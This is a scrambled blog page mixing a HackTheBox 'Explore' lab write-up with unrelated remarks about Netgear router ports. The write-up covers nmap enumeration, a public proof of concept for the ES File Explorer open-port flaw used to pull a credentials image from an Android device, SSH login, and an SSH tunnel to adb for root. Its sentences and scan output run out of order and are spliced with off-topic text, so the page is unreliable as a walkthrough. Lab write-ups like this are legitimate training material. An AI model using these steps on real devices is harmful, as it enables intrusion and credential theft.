Once the tunnel has been created we can connect to the device using adb, becoming root pretty easily. The flag -N tells SSH that we do not want execute any command.The flag -f puts SSH in the background so we can keep executing commands in the terminal.The flag -L creates a link in the local port 5555.kali : ~ / Documents / HTB / Explore$ ssh - p 2222 kristi - L localhost: 5555 :localhost: 5555 - fN In order to create that tunnel we need to execute the following command. Iptables -A INPUT -p tcp -dport 5555 -j DROP Iptables -A INPUT -p tcp -s localhost -dport 5555 -j ACCEPT Looking inside the file /etc/init.sh we can see that the port 5555 is being blocked by iptables so we can not access to the device using adb unless we create an SSH tunnel. kali : ~ / Documents / HTB / Explore$ ssh - p 2222 kristi : / sdcard $ cat user. The user flag can be found at /sdcard/user.txt. In this photo we can read the user kristi and the password that can be used for getting access through ssh. jpg -host 10.10.10.247 Server responded with : 200 Writing to file : creds. py - g / storage / emulated / 0 / DCIM / creds. kali : / tmp / ESFileExplorerOpenPortVuln$ python3 poc. 10.247 Server responded with : 200 īetween all of them there is a file named creds.jgp that we can download with the following command. 10.247 Executing command : listPics on 10.10. : /tmp/ESFileExplorerOpenPortVuln$ python3 poc.py -cmd listPics -host 10.10. ExploitationĮxecuting the PoC we can obtain the pictures stored in the device. Looking on google about information for each port we discover that the port 59777 is used by the application ES File Explorer and has an CVE with a PoC on GitHub. Freeciv versions up to 2.0, Hewlett-Packard Data Protector, McAfee EndPoint Encryption Database Server, SAP, Default for Microsoft Dynamics CRM 4.0. # Nmap done at Sat Jun 26 17:26:02 2021 - 1 IP address (1 host up) scanned in 109.46 seconds If you know the service/version, please submit the following fingerprints at : Service detection performed. Ģ services unrecognized despite returning data. ![]() |_http-title: Site doesn' t have a title ( text/plain ). | _http-title: Site doesn 't have a title (text/html).ĥ9777/tcp open http Bukkit JSONAPI httpd for Minecraft game server 3.6.0 or older 42135 /tcp open http ES File Explorer Name Response httpd Play FreeCiv online, in a web browser, on your cellphone or tablet Play game. The game commences in prehistory and your mission is to lead your tribe from the Stone Age to the Space Age. ![]() | _ 2048 71 :90:e3:a7:c9:5d:83:66:34:88:3d:eb:b4:c7:88:fb ( RSA ) 5555 /tcp filtered freeciv FreeCiv is a Free and Open Source empire-building strategy game inspired by the history of human civilization. 10.247Ģ222 /tcp open ssh ( protocol 2.0 ) | fingerprint-strings: Then, we continue with a deeper scan of every opened port getting more information about each service. Nmap done: 1 IP address ( 1 host up ) scanned in 168.58 seconds ![]() sudo nmap -sS -p-n -T5 -oN AllPorts.txt 10.10. EnumerationĪs always, let's start finding all opened ports in the machine with nmap. Later, the attacker will have to use a SSH tunnel in order to access to the device using adb and becoming root. I generally download dd-wrt to my modems, sothey are removed.Explore is a very easy Android machine from HackTheBox where the attacker will have to exploit a vulnerability for the application Es File Explorer in order to obtain RCE on the machine, obtaining the user credentials. So those extra ports are, I think, to support the smart config tools. Port 80 is http so just point Firefox to you modems address, you will get you modems config screen. In any case I think you will find that the dhcp server is setting the DNS server to the router, and that will,be using port 53 so it's being poked all the time, ![]() Then ask it to resolved names to IP addresses. To poke on DNS port 53, run nslookup and use the command "server IPaddress". The 3333 port, looking at that link I'd guess it's part of the netgenie discovery, but I could not find any support for that Which I understand is sort of of a superset or uses http. In it they talk about netgenie making soap calls to the device on port 5555. I think that the netgenie app uses port 5555 to talk to and setup the Netgear modem.
0 Comments
Leave a Reply. |
AuthorWrite something about yourself. No need to be fancy, just an overview. ArchivesCategories |